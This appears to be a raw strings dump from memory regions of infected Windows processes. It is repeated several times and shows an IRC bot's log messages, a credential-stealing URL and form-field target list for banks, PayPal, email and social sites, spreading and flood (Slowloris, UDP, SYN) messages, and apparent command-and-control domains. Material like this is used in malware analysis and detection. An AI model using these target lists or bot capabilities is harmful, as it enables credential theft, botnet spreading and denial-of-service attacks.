[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

\??\%System%\winlogon.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\winlogon.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

services.exe_756_rwx_00B60000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%System%\services.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\services.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

svchost.exe_940_rwx_00ED0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%System%\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

svchost.exe_1020_rwx_00B50000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%System%\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

svchost.exe_1104_rwx_022D0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0.

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

